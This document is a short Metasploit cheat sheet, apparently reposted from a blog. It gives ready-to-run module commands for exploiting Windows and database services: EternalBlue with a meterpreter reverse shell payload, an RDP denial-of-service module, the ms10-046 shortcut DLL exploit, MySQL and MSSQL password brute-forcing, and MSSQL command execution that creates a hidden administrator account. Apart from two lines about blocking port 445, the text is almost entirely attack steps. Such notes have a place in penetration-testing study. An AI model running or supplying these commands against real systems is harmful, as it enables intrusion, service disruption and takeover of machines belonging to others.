EternalBlue (ms17-010):
[Port 445 open]
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost ip
run
Defense:
Disable the SMB service (network file sharing) on port 445
Enable the firewall and set an inbound rule for connections on port 445
Blue screen attack (ms12-020):
[Port 3389 open]
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost ip
run
File sharing (ms10-046):
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set srvhost kaliip
run
MySQL brute-force login:
Probe:
use auxiliary/scanner/mysql/mysql_version
set rhosts ip
run
Login:
use auxiliary/scanner/mysql/mysql_login
set rhosts ip
set pass_file password.txt
set user_file user.txt
run
mssql:
Find the mssql port:
use auxiliary/scanner/mssql/mssql_ping
set rhost ip
run
(nmap -sV ip also works, but the results are poor)
mssql brute force:
use auxiliary/scanner/mssql/mssql_login
set rhost ip
set pass_file password.txt
set rport x
run
mssql command execution (add an account):
use auxiliary/admin/mssql/mssql_exec
set rhost ip
set rport
set cmd cmd.exe /c net user test 123 /add
run
set cmd cmd.exe /c net localgroup administrators test /add
run
Original article: https://www.cnblogs.com/f1veseven/p/13577268.html